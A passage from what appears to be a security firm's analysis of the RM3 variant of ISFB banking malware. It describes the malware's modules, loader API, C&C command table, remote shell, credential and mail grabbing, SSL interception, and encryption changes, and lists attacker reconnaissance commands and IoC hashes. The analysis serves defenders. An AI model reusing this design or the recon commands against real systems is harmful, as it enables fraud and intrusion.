Controller\r\nMicrosoft Edge Hooking\r\nmodule (Chromium one)\r\n0x27ed1635 keylog.dll PX Controller Keylogging module\r\n0x6bb59728 mail.dll PX Controller Mail Grabber module\r\n0x1c4f452a vnc.dll PX Controller VNC module\r\n0x970a7584 sqlite.dll PX Controller\r\nSQLITE Library required for\r\nsome module\r\n0xfe9c154b ftp.dll PX Controller FTP module\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 21 of 52\n\nCRC Module Name\r\nPE\r\nFormat\r\nStage Description\r\n0xd9839650 socks.dll PX Controller Socks module\r\n0x1f8fde6b cmdshell.dll PX Controller\r\nPersistent remote shell\r\nmodule\r\nAdditionally, more configuration files ( .ini ) are used to store all the critical information implemented in RM3.\r\nFour different files are currently known:\r\nCRC Name\r\n0x8fb1dde1 loader.ini\r\n0x68c8691c explorer.ini\r\n0xd722afcb client.ini†\r\n0x68c8691c vnc.ini\r\n† CLIENT.INI is never intended to be seen in an RM3 binary, as it is intended to be received by the loader C\u0026C\r\n(aka “the host”, based on its field name on configs). This is completely different from older ISFB strains, where\r\nthe client.ini is stored in the client32.bin/client64.bin. So it means, if the loader c\u0026c is offline, there is no option to\r\nget this crucial file\r\nMoving this file is a clever move by the RM3 malware developers and the TAs using it as they have reduced the\r\nrisk of having researcher bots in their ecosystem.\r\nRM3 dependency madness\r\nWith client32.bin (from the more standard ISFB v2 form) technically not present itself but instead implemented\r\nas an accumulation of modules injected into a process, RM3 is drastically different from its predecessors. It has\r\ntotally changed its micro-ecosystem by forcing all of its modules to interact with each other (except bl.dll) and as\r\nshown below.\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 22 of 52\n\nAll interactions between RM3 modules\r\nThese changes also slow down any in-depth analysis, as they make it way harder to analyse as a standalone\r\nmodule.\r\nExternal calls from other RM3 modules (8576b0d0 and e695437)\r\nRM3 Module 101\r\nThanks to the startup module launched by start.ps1 in the registry, a hidden shell worker is plugged into\r\nexplorer.exe (not the explorer.dll module) that initialises a hooking instance for specific WinAPI/COM calls. This\r\nallows the banking malware to inject all its components into every child process coming from that Windows\r\nprocess. This strategy permits RM3 to have total control of all user interactions.\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 23 of 52\n\n(*) PoV = Point of View\r\nLooking at DllMain, the code hasn’t changed that much in the years since the ISFB leak.\r\nBOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {\r\n BOOL Ret = TRUE;\r\n WINERROR Status = NO_ERROR;\r\n Ret = 1;\r\n if ( ul_reason_for_call ) {\r\n if ( ul_reason_for_call == 1 \u0026\u0026 _InterlockedIncrement(\u0026g_AttachCount) == 1 ) {\r\n Status = ModuleStartup(hModule, lpReserved); // \u003c- Main call\r\n if ( Status ) {\r\n SetLastError(Status);\r\n Ret = 0;\r\n }\r\n }\r\n }\r\n else if ( !_InterlockedExchangeAdd(\u0026g_AttachCount, 0xFFFFFFFF) ) {\r\n ModuleCleanup();\r\n }\r\n return Ret;\r\n}\r\nIt is only when we get to the ModuleStartup call that things start to become interesting. This code has been\r\nrefactored and adjusted to the RM3 philosophy:\r\nstatic WINERROR ModuleStartup(HMODULE hModule) {\r\n WINERROR Status;\r\n RM3_Struct RM3;\r\n // Need mandatory RM3 Struct Variable, that contains everything\r\n // By calling an export function from BL.DLL\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 24 of 52\n\nRM3 = bl!GetRM3Struct();\r\n // Decrypting the .bss section\r\n // CsDecryptSection is the supposed name based on ISFB leak\r\nStatus = bl!CsDecryptSection(hModule, 0);\r\n \r\n if ( (gs_Cookie ^ RM3-\u003edCrc32ExeName) == PROCESSNAMEHASH )\r\n Status = Startup()\r\n return(Status);\r\n}\r\nThis adjustment is pretty similar in all modules and can be summarised as three main steps:\r\nRequesting from bl.dll a critical global structure (called RM3_struct for the purpose of this article) which\r\nhas the minimal requirements for running the injected code smoothly. The structure itself changes based on\r\nwhich module it is. For example, bl.dll mostly uses it for recreating values that seem to be part of the PEB\r\n(hypothesis); explorer.dll uses this structure for storing timeout values and browsers.dll uses it for RM3\r\ninjects configurations.\r\nDecrypting the .bss section.\r\nEntering into the checking routine by using an ingenious mechanism:\r\nThe filename of the child process is converted into a JamCRC32 hash and compared with the one\r\nstored in the startup function. If it matches, the module starts its worker routine, otherwise it quits.\r\nThese are a just a few particular cases, but the philosophy of the RM3 Module startup is well represented here. It\r\nis a simple and clever move for monitoring user interactions, because it has control over everything coming from\r\nexplorer.exe.\r\nbl.dll – The backbone of RM3\r\nThe background loader is almost nothing and everything at the same time. It’s the root of the whole RM3\r\ninfrastructure when it’s fully installed and configured by the initial loader. Its focus is mainly to initialise\r\nRM3_Struct and permits and provides a fundamental RM3 API to all other modules:\r\nOrdinal | Goal\r\n==========================================\r\n856b0d0_1 | bl!GetBuild\r\n856b0d0_2 | bl!GetRM3Struct\r\n856b0d0_3 | bl!WaitForSingleObject\r\n856b0d0_4 | bl!GenerateRNG\r\n856b0d0_5 | bl!GenerateGUIDName\r\n856b0d0_6 | bl!XorshiftStar\r\n856b0d0_7 | bl!GenerateFieldName\r\n856b0d0_8 | bl!GenerateCRC32Checksum\r\n856b0d0_9 | bl!WaitForMultipleObjects\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 25 of 52\n\n856b0d0_10 | bl!HeapAlloc\r\n856b0d0_11 | bl!HeapFree\r\n856b0d0_12 | bl!HeapReAlloc\r\n856b0d0_13 | bl!???\r\n856b0d0_14 | bl!Aplib\r\n856b0d0_15 | bl!ReadSubKey\r\n856b0d0_16 | bl!WriteSubKey\r\n856b0d0_17 | bl!CreateProcessA\r\n856b0d0_18 | bl!CreateProcessW\r\n856b0d0_19 | bl!GetRM3MainSubkey\r\n856b0d0_20 | bl!LoadModule\r\n856b0d0_21 | bl!???\r\n856b0d0_22 | bl!OpenProcess\r\n856b0d0_23 | bl!InjectDLL\r\n856b0d0_24 | bl!ReturnInstructionPointer\r\n856b0d0_25 | bl!GetPRNGValue\r\n856b0d0_26 | bl!CheckRSA\r\n856b0d0_27 | bl!Serpent\r\n856b0d0_28 | bl!SearchConfigFile\r\n856b0d0_29 | bl!???\r\n856b0d0_30 | bl!ResolveFunction01\r\n856b0d0_31 | bl!GetFunctionByIndex\r\n856b0d0_32 | bl!HookFunction\r\n856b0d0_33 | bl!???\r\n856b0d0_34 | bl!ResolveFunction02\r\n856b0d0_35 | bl!???\r\n856b0d0_36 | bl!GetExplorerPID\r\n856b0d0_37 | bl!PsSupSetWow64Redirection\r\n856b0d0_40 | bl!MainRWFile\r\n856b0d0_42 | bl!PipeSendCommand\r\n856b0d0_43 | bl!PipeMainRWFile\r\n856b0d0_44 | bl!WriteFile\r\n856b0d0_45 | bl!ReadFile\r\n856b0d0_50 | bl!RebootBlModule\r\n856b0d0_51 | bl!LdrFindEntryForAddress\r\n856b0d0_52 | bl!???\r\n856b0d0_55 | bl!SetEAXToZero\r\n856b0d0_56 | bl!LdrRegisterDllNotification\r\n856b0d0_57 | bl!LdrUnegisterDllNotification\r\n856b0d0_59 | bl!FillGuidName\r\n856b0d0_60 | bl!GenerateRandomSubkeyName\r\n856b0d0_61 | bl!InjectDLLToSpecificPID\r\n856b0d0_62 | bl!???\r\n856b0d0_63 | bl!???\r\n856b0d0_65 | bl!???\r\n856b0d0_70 | bl!ReturnOne\r\n856b0d0_71 | bl!AppAlloc\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 26 of 52\n\n856b0d0_72 | bl!AppFree\r\n856b0d0_73 | bl!MemAlloc\r\n856b0d0_74 | bl!MemFree\r\n856b0d0_75 | bl!CsDecryptSection (Decrypt bss, real name from isfb leak source code)\r\n856b0d0_76 | bl!CreateThread\r\n856b0d0_78 | bl!GrabDataFromRegistry\r\n856b0d0_79 | bl!Purge\r\n856b0d0_80 | bl!RSA\r\nexplorer.dll – the RM3 mastermind\r\nExplorer.dll could be regarded as the opposite of the background loader. It is designed to manage all interactions\r\nof this banking malware, at any level:\r\nChecking timeout timers that could lead to drastic changes in RM3 operations\r\nAllowing and executing all tasks that RM3 is able to perform\r\nStarting fundamental grabbing features\r\nDownload and update modules and configs\r\nLaunch modules\r\nModifying RM3 URIs dynamically\r\nAn overview of the RM3 explorer.dll module\r\nIn the task manager worker, the workaround looks like the following:\r\nRM3 task manager implemented in explorer.dll\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 27 of 52\n\nInterestingly, the RM3 developers abuse their own hash system (JAMCRC32) by shuffling hashes into very large\r\namounts of conditions. By doing this, they create an ecosystem that is seemingly unique to each build. Because of\r\nthis, it feels a major update has been performed on an RM3 module although technically it is just another anti-disassembly trick for greatly slowing down any in-depth analysis. On the other hand, this task manager is a gold\r\nmine for understanding how all the interactions between bots and the C\u0026C are performed and how to filter them\r\ninto multiple categories.\r\nGeneral command\r\nGeneral commands\r\nCRC Command Description\r\n0xdf43cd90 CRASH Generate and send a crash report\r\n0x274323e2 RESTART Restart RM3\r\n0xce54bcf5 REBOOT Reboot system\r\nRecording\r\nCRC Command Description\r\n0x746ce763 VIDEO Start desktop recording of the victim machine\r\n0x8de92b0d SETVIDEO VIDEO pivot condition\r\n0x54a7c26c SET_VIDEO Preparing desktop recording\r\nUpdates\r\nCRC Command Description\r\n0xb82d4140 UPDATE_ALL Forcing update for all module\r\n0x4f278846 LOAD_UPDATE Load \u0026 Execute and updated PX module\r\nTasks\r\nCRC Command Description\r\n0xaaa425c4 USETASKKEY Use task.bin pubkey for decrypting upcoming tasks\r\nTimeout settings\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 28 of 52\n\nCRC Command Description\r\n0x955879a6 SENDTIMEOUT Timeout timer for receiving commands\r\n0xd7a003c9 CONFIGTIMEOUT Timeout timer for receiving inject config updates\r\n0x7d30ee46 INITIMEOUT Timeout timer for receiving INI config update\r\n0x11271c7f IDLEPERIOD Timeout timer for bot inactivity\r\n0x584e5925 HOSTSHIFTTIMEOUT Timeout timer for switching C\u0026C domain list\r\n0x9dd1ccaf STANDBYTIMEOUT\r\nTimeout timer for switching primary C\u0026C’s to\r\nStand by ones\r\n0x9957591 RUNCHECKTIMEOUT Timeout timer for checking \u0026 run RM3 autorun\r\n0x31277bd5 TASKTIMEOUT Timeout timer for receiving a task request\r\nClearing\r\nCRC Command Description\r\n0xe3289ecb CLEARCACHE CLR_CACHE pivot condition\r\n0xb9781fc7 CLR_CACHE Clear all browser cache\r\n0xa23fff87 CLR_LOGS Clear all RM3 logs currently stored\r\n0x213e71be DEL_CONFIG Remove requested RM3 inject config\r\nHTTP\r\nCRC Command Description\r\n0x754c3c76 LOGHTTP Intercept \u0026 log POST HTTP communication\r\n0x6c451cb6 REMOVECSP Remove CSP headers from HTTP\r\n0x97da04de MAXPOSTLENGTH Clear all RM3 logs currently stored\r\nProcess execution\r\nCRC Command Description\r\n0x73d425ff NEWPROCESS Initialising RM3 routine\r\nBackup\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 29 of 52\n\nCRC Command Description\r\n0x5e822676 STANDBY\r\nCase condition if primary servers are not responding for X\r\nminutes\r\nData gathering\r\nCRC Command Description\r\n0x864b1e44 GET_CREDS Collect credentials\r\n0xdf794b64 GET_FILES Collect files (grabber module)\r\n0x2a77637a GET_SYSINFO Collect system information data\r\nMain tasks\r\nCRC Command Description\r\n0x3889242 LOAD_CONFIG\r\nDownload and Load a requested config with specific\r\narguments\r\n0xdf794b64 GET_FILES\r\nDownload a DLL from a specific URL and load it into\r\nexplorer.exe\r\n0xae30e778 LOAD_EXE Download an executable from a specific URL and load it\r\n0xb204e7e0 LOAD_INI Download and load an INI file from a specific URL\r\n0xea0f4d48 LOAD_CMD Load and Execute Shell module\r\n0x6d1ef2c6 LOAD_FTP Load and Execute FTP module with specific arguments\r\n0x336845f8 LOAD_KEYLOG\r\nLoad and Execute keylog module with specific\r\narguments\r\n0xdb269b16 LOAD_MODULE\r\nLoad and Execute RM3 PX Module with specific\r\narguments\r\n0x1e84cd23 LOAD_SOCKS Load and Execute socks module with specific arguments\r\n0x45abeab3 LOAD_VNC Load and Execute VNC module with specific arguments\r\nShell command\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 30 of 52\n\nCRC Command Description\r\n0xb88d3fdf RUN_CMD Execute specific command and send the output to the C\u0026C\r\nURI setup\r\nCRC Command Description\r\n0x9c3c1432 SET_URI Change the URI path of the request\r\nFile storage\r\nCRC Command Description\r\n0xd8829500 STORE_GRAB Save grabber content into temporary file\r\n0x250de123 STORE_KEYLOG Save keylog content into temporary file\r\n0x863ecf42 STORE_MAIL Save stolen mail credentials into temporary file\r\n0x9b587bc4 STORE_HTTPLOG Save stolen http interceptions into temporary file\r\n0x36e4e464 STORE_ACC Save stolen credentials into temporary file\r\nTimeout system\r\nWith its timeout values stored into its rm3_struct, explorer.dll is able to manage every possible worker task\r\nlaunched and monitor them. Then, whenever one of the timers reaches the specified value, it can modify the\r\nbehaviour of the malware (in most cases, avoiding unnecessary requests that could create noise and so increase the\r\nchances of detection).\r\nCOM Objects being inspected for possible timeout\r\nBackup controllers\r\nIn the same way, explorer.dll also provides additional controllers which are called ‘stand by’ domains. The idea\r\nbehind this is that, when principal controller C\u0026Cs don’t respond, a module can automatically switch to this\r\npreset list. Those new domains are stored in explorer.ini.\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 31 of 52\n\n{\r\n \"STANDBY\": \"standbydns1.tld\",\"standbydns2.tld\"\r\n \"STANDBYTIMEOUT\": \"60\" // Timeout in minutes\r\n}\r\nIn the example above, if the primary domain C\u0026Cs did not respond after one hour, the request would\r\nautomatically switch to the standby C\u0026Cs.\r\nDesktop recording and RM3 – An ingenious way to check bots\r\nRarely mentioned in the wild but actively used by TAs, RM3 is also able to record bot interactions. The video\r\nsetup is stored in the client.ini file, which the bot receives from the controller domain.\r\n\"SETVIDEO\": [\r\n \"30,\", // 30 seconds\r\n \"8,\", // 8 Level quality (min:1 - max:10)\r\n \"notipda\" // Process name list\r\n],\r\nBehind “SETVIDEO”, only 3 values are required to setup video recording:\r\nRM3 AVI recording setup\r\nAfter being initialised, the task waits its turn to be launched. It can be triggered to work in multiple ways:\r\nDetecting the use of specific keywords in a Windows process\r\nUsing RM3’s increased debugging telemetry to detect if something is crashing, either in the banking\r\nmalware itself or in a deployed injects (although the ability to detect crashes in an inject is only\r\nhypothetical and has not been observed)\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 32 of 52\n\nRecording user interactions with a bank account; the ability to record video is a relatively new but killer\r\nmove on the part of the malware developers allowing them to check legitimate bots and get injects\r\nThe ability to record video depends only on “@VIDEO=” being cached by the browser module. It is not primarily\r\nseen at first glance when examining the config, but likely inside external injects parts.\r\n@ ISFB Code leak\r\nВкладка Video - запись видео с экрана\r\nOpcode = \"VIDEO\"\r\nUrl - задает шаблон URL страницы, для которой необходмо сделать запись видео с экрана\r\nTarget - (опционально) задает ключевое слово, при наличии которого в коде страницы будет сде\r\nVar - задаёт длительность записи в секундах\r\nRM3 browser webinject module detecting if it needs to launch a recording session (or any other\r\nparticular task).\r\nRM3 and its remote shell module – a trump card for ransomware gangs\r\nBanking malware having its own remote shell module changes the potential impact of infecting a corporate\r\nnetwork drastically. This shell is completely custom to the malware and is specially designed. It is also\r\nsignificantly less detectable than other tools currently seen for starting lateral movement attacks due to its rarity.\r\nThe combination of potentially much greater impact and lower detectability make this piece of code a trump card,\r\nparticularly as they now look to migrate to a ransomware model.\r\nCalled cmdshell, this module isn’t exclusive to RM3 but has in fact, been part of ISFB since at least build v2.15.\r\nIt has likely been of interest for TA groups in fields less focused on fraud since then. The inclusion of a remote\r\nshell obviously greatly increases the flexibility this malware family provides to its operators; but also, of course,\r\nmakes it harder to ascertain the exact purpose of any one infection, or the motivation of its operators.\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 33 of 52\n\nCmdshell module being launched by the RM3 Task Manager\r\nAfter being executed by the task command “LOAD_CMD”, the injected module installs a persistent remote shell\r\nwhich a TA can use to perform any kind of command they want.\r\nRM3 cmdshell module creating the remote shell\r\nAs noted above, the inclusion of a shell gives great flexibility, but can certainly facilitate the work of at least two\r\ntypes of TA:\r\nFraudsters (if the VNC/SOCKS module isn’t working well, perhaps)\r\nMalicious Red teams affiliated with ransomware gangs\r\nIt’s worth noting that this remote shell should not be confused with the RUN_CMD command. The RUN_CMD is\r\nused to instruct a bot to execute a simple command with the output saved and sent to the Controllers. It is also\r\npresent as a simple condition:\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 34 of 52\n\nRUN_CMD inside the RM3 Task Manager\r\nThen following a standard I/O interaction:\r\nExecuting task in cmd console and saving results into an archive\r\nBut both RM3’s remote shell and the RUN_CMD can be an entry point for pushing other specialised tools like\r\nCobalt Strike, Mimikatz or just simple PowerShell scripts. With this kind of flexibility, the main limitation on the\r\nimpact of this malware is any given TA’s level of skill and their imagination.\r\nTask.key – a new weapon in RM3’s encryption paranoia\r\nImplemented sometime around Q2 2020, RM3 decided to add an additional layer of protection in its network\r\ncommunications by updating the RSA public key used to encrypt communications between bot and controller\r\ndomains.\r\nThey designed a pivot condition (USETASKKEY) that decides which RSA.KEY and TASK.KEY will be used for\r\ndecrypting the content from the C\u0026C depending of the command/content received. We believed this choice has\r\nbeen developed for breaking researcher for emulating RM3 traffic.\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 35 of 52\n\nExtra condition with USETASKKEY to avoid using the wrong RSA pubkey\r\nRM3 – A banking malware designed to debug itself\r\nAs we’ve already noted, RM3 represents a significant step change from previous versions of ISFB. These changes\r\nextend from major architecture changes down to detailed functional changes and so can be expected to have\r\ninvolved considerable development and probably testing effort, as well. Whether or not the malware developers\r\nfound the troubleshooting for the RM3 variant more difficult than previously, they also took the opportunity to\r\ninclude a troubleshooting feature. If RM3 experiences any issues, it is designed to dump the relevant process and\r\nsend a report to the C\u0026C. It’s expected that this would then be reported to the malware developers and so may\r\nexplain why we now see new builds appearing in the wild rather faster than we have previously.\r\nThe task is initialised at the beginning of the explorer module startup with a simple workaround:\r\nAddress of the MiniDumpWritDump function from dbghelp.dll is stored\r\nThe path of the temporary dump file is stored in C://tmp/rm3.dmp\r\nAll these values are stored into a designed function and saved into the RM3 master struct\r\nCrash dump being initialized and stored into the RM3 global structure\r\nWith everything now configured, RM3 is ready for two possible scenarios:\r\nVoluntarily crashing itself with the command ‘CRASH’\r\nSomething goes wrong and so a specific classic error code triggers the function\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 36 of 52\n\nRM3 executing the crash dump routine\r\nStolen Data – The (old) gold mine\r\nGathering interesting bots is a skill that most banking malware TAs have decent experience with after years of\r\nfraud. And nowadays, with the ransomware market exploding, this expertise probably also permits them to\r\naffiliate more easily with ransom crews (or even to have exclusivity in some cases).\r\nIn general, ISFB (v2 and v3) is a perfect playground as it can be used as a loader with more advanced telemetry\r\nthan classic info-stealers. For example, Vidar, Taurus or Raccoon Stealer can’t compete at this level. This is\r\nbecause the way they are designed to work as a one-shot process (and be removed from the machine immediately\r\nafterwards) makes them much less competitive than the more advanced and flexible ISFB. Of course, in any given\r\nsituation, this does not necessarily mean they are less important than banking malware. And we should keep in\r\nmind the fact that the Revil gang bought the source code for the Kpot stealer and it is likely this was so they could\r\ndevelop their own loader/stealer.\r\nRM3 can be split into three main parts in terms of the grabber:\r\nFiles/folders\r\nBrowser credential harvesting\r\nMail\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 37 of 52\n\nAn overview of standard stealing feature developed by RM3\r\nIt’s worth noting that the mail module is an underrated feature that can provide a huge amount of information to a\r\nTA:\r\nMany users store nearly everything in their email (including passwords and sensitive documents)\r\nMails can be stolen and resold to spammers for crafting legitimate mails with malicious attachments/links\r\nStealing/intercepting HTTP and HTTPS communication\r\nRM3 implements an SSL Proxy and so is really effective at intercepting POST requests performed by the user. All\r\nof them are stored and sent every X minutes to the controllers.\r\nRM3 browser module initializing the SSL proxy interception\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 38 of 52\n\nRM3 SSL Proxy running on MsEdge\r\nWhenever the user visits a website, part of the inject config will automatically replace strings or variables in the\r\ncode (‘base’) with the new content (‘new_var’); this often includes a URL path from an inject C\u0026C.\r\nAs if that wasn’t complicated enough, most of them are geofencedand it could be possible they manually allow the\r\nbot to get them (especially with the elite one). Indeed, this is another trick for avoiding analysts and researchers to\r\nget and report those scripts  that cost millions to financial companies.\r\nA typical inject entry in config.bin\r\nA parser then modifies the variable ‘@ID@ and ‘@GROUP@’ to the correct values as stored in RM3_Struct and\r\nother structures relevant to the browsers.dll module.\r\nBrowser inject module parsing config.bin and replacing with respective botid and groupid\r\nSystem information gathering\r\nGathering system information is simple with RM3:\r\nManually (using a specific RUN_CMD command)\r\nRequesting info from a bot with GET_SYSINFO\r\nIndeed, GET_SYSINFO is known and regularly used by ISFB actors (both active strains)\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 39 of 52\n\nsysteminfo.exe\r\ndriverquery.exe\r\nnet view\r\nnslookup 127.0.0.1\r\nwhoami /all\r\nnet localgroup administrators\r\nnet group \"domain computers\" /domain\r\nTAs in general are spending a lot of time (or are literally paying people) to inspect bots for the stolen data they\r\nhave gathered. In this regard, bots can be split into one of the following groups:\r\nHome bots (personal accounts)\r\nResearcher bots\r\nCorporate bots (compromised host from a company)\r\nOver the past 6 months, ISFB v2 has been seen to be extremely active in term of updates. One purpose of these\r\nupdates has been to help TAs filter their bots from the loader side directly and more easily. This filtering is not a\r\nnew thing at all, but it is probably of more interest (and could have a greater impact) for malicious operations\r\nthese days. \r\nMicrosoft Edge (Chromium) joining the targeted browser list\r\nOne critical aspect of any banking malware is the ability to hook into a browser so as to inject fakes and replacers\r\nin financial institution websites.\r\nAt the same time as the Task.key implementation, RM3 decided to implement a new browser in its targeted list:\r\n“MsEdge”. This was not random, but was a development choice driven by the sheer number of corporate\r\ncomputers migrating from Internet Explorer to Edge.\r\nRM3 MsEdge startup module\r\nThis means that 5 browsers are currently targeted:\r\nInternet Explorer\r\nMicrosoft Edge (Original)\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 40 of 52\n\nMicrosoft Edge (Chromium)\r\nMozilla Firefox\r\nGoogle Chrome\r\nCurrently, RM3 doesn’t seem to interact with Opera. Given Opera’s low user share and almost non-existent\r\ncorporate presence, it is not expected that the development of a new module/feature for Opera would have an ROI\r\nthat was sufficiently attractive to the TAs and RM3 developers. Any development and debugging would be time\r\nconsuming and could delay useful updates to existing modules already producing a reliable return.\r\nRM3 and its homemade forked SQLITE module\r\nA lot of this blogpost has been dedicated to discussing the innovative design and features in RM3. But perhaps the\r\nbest example of the attention to detail displayed in the design and development of this malware is the custom\r\nSQLITE3 module that is included with RM3. Presumably driven by the need to extract credentials data from\r\nbrowsers (and related tasks), they have forked the original SQLite3 source code and refactored it to work in RM3.\r\nUsing SQLite is not a new thing, of course, as it was already noted in the ISFB leak.\r\nInterestingly, the RM3 build is based on the original 3.8.6 build and has all the features and functions of the\r\noriginal version.\r\nBecause the background loader (bl.dll) is the only module within RM3 technically capable of performing\r\nallocation operations, they have simply integrated “free”, “malloc”, and “realloc” API calls with this backbone\r\nmodule.\r\nWhat’s new with Build 300960?\r\nGoodbye Serpent, Hello AES!\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 41 of 52\n\nAround mid-march, RM3 pushed a major update by replacing the Serpent encryption with the good old AES 128\r\nCBC. All locations where Serpent encryption was used, have been totally reworked so as to work with AES.\r\nAES 128 CBC implementation in RM3\r\nRM3 C\u0026C response also reviewed\r\nBefore build 300960, RM3 treated data received from controllers as described below. Information was split into\r\ntwo encrypted parts (a header and a body) which are treated differently:\r\n1. The encrypted head was decrypted with the public RSA key extracted from modules, to extract a Serpent\r\nkey\r\n2. This Serpent key was then used to decrypt the encrypted data in the body (this is a different key from\r\nclient.ini and loader.ini).\r\nThis was the setup before build 300960:\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 42 of 52\n\nNow, in the recently released 300960 build, with Serpent removed and AES implemented instead, the structure of\r\nthe encrypted header has changed as indicated below:\r\nThe decrypted body data produced by this process is not in an entirely standard format. In fact, it’s compressed\r\nwith the APlib library. But removing the first 0x14 bytes (or sometimes 0x4 bytes) and decompressing it, ensures\r\nthat the final block is ready for analysis.\r\nIf it’s a DLL, it will be recognised with the PX format\r\nIf it’s web injects, it’s an archive that contains .sig files (that is, MAIN.SIG†)\r\nIf it’s tasks or config updates, these are in a classic raw ISFB config format\r\n† SIG can probably be taken to mean ‘signature’\r\nChanges in .ini files\r\nTwo fields have been added in the latest campaigns. Interestingly, these are not new RM3 features but old ones\r\nthat have been present for quite some time.\r\n{\r\n \"SENDFGKEY\": \"0\", // Send Foreground Key\r\n \"SUBDOMAINS\": \"0\",\r\n}\r\nAppendix\r\nIoCs – Campaign\r\n00cd7319a42bbabd0c81a7e9817d2d5071738d5ac36b98b8ff9d7383c3d7e1ba - DE\r\na7007821b1acbf36ca18cb2ec7d36f388953fe8985589f170be5117548a55c57 - Italy\r\n5ee51dfd1eb41cb6ce8451424540c817dbd804f103229f3ae1b645b320cbb4e8 - Australia/NZ 1\r\nc7552fe5ed044011aa09aebd5769b2b9f3df0faa8adaab42ef3bfff35f5190aa - Australia/NZ 2\r\n261c6f7b7e9d8fc808a4a9db587294202872b2a816b2b98516551949165486c8 - UK 1\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 43 of 52\n\n2e0b219c5ac3285a08e126f11c07ea3ac60bc96d16d37c2dc24dd8f68c492a74 - UK 2\r\n6818b6b32cb91754fd625e9416e1bc83caac1927148daaa3edaed51a9d04e864 - Worldwide ?\r\n86b670d81a26ea394f7c0edebdc93e8f9bd6ce6e0a8d650e32a0fe36c93f0dee - GoziAT/ISFB RM2\r\nIoCs – Modules\r\nb15c3b93f8de40b745eb1c1df5dcdee3371ba08a1a124c7f20897f87f23bcd55 loader.exe (Build 300932)\r\nce4fc5dcab919ea40e7915646a3ce345a39a3f81c33758f1ba9c1eae577a5c35 loader.dll (Build 300932)\r\nba0e9cb3bf25516e2c1f0288e988bd7bd538d275373d36cee28c34dafa7bbd1f explorer.dll (Build 300932)\r\naccb76e6190358760044d4708e214e546f87b1e644f7e411ba1a67900bcd32a1 bl.dll (Build 300932)\r\nf90ed3d7c437673c3cfa3db8e6fbb3370584914def2c0c2ce1f11f90f199fb4f ntwrk.dll (Build 300932)\r\n38c9aff9736eae6db5b0d9456ad13d1632b134d654c037fba43086b5816acd58 rt.dll (Build 300932)\r\n2c7cdcf0f9c2930096a561ac6f9c353388a06c339f27f70696d0006687acad5b browser.dll (Build 300932)\r\n34517a7c78dd66326d0d8fbb2d1524592bbbedb8ed6b595281f7bb3d6a39bc0a chrome.dll (Build 300932)\r\n59670730341477b0a254ddbfc10df6f1fcd3471a08c0d8ec20e1aa0c560ddee4 firefox.dll (Build 300932)\r\nd927f8793f537b94c6d2299f86fe36e3f751c94edca5cd3ddcdbd65d9143b2b6 iexplorer.dll (Build 300932)\r\n199caec535d640c400d3c6b35806c74912b832ff78cb31fd90fe4712ed194b09 microsoftedgecp.dll (Build 300932)\r\n13635b2582a11e658ab0b959611590005b81178365c12062e77274db1d0b4f0c msedge.dll (Build 300932)\r\n65a1923e037bce4816ac2654c242921f3e3592e972495945849f155ca69c05e5 loader.dll (Build 300960)\r\nd1f5ef94e14488bf909057e4a0d081ff18dd0ac86f53c42f53b12ea25cdcfe76 cmdshell.dll (Build 300869)\r\n820faca1f9e6e291240e97e5768030e1574b60862d5fce7f6ba519aaa3dbe880 vnc.dll (Build 300869)\r\nShellcode – startup module – bss decrypted\r\nWindows Security\r\nNTDLL.DLL\r\nRtlExitUserProcess\r\nKERNEL32.DLL\r\nbl.dll - bss decrypted\r\nMicrosoft Windows\r\nKERNEL32.DLL\r\nADVAPI32.DLL\r\nNTDLL.DLL\r\nKERNELBASE\r\nUSER32\r\nLdrUnregisterDllNotification\r\nResolveDelayLoadsFromDll\r\nSoftware\r\nWow64EnableWow64FsRedirection\r\n\\REGISTRY\\USER\\%s\\%s\\\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 44 of 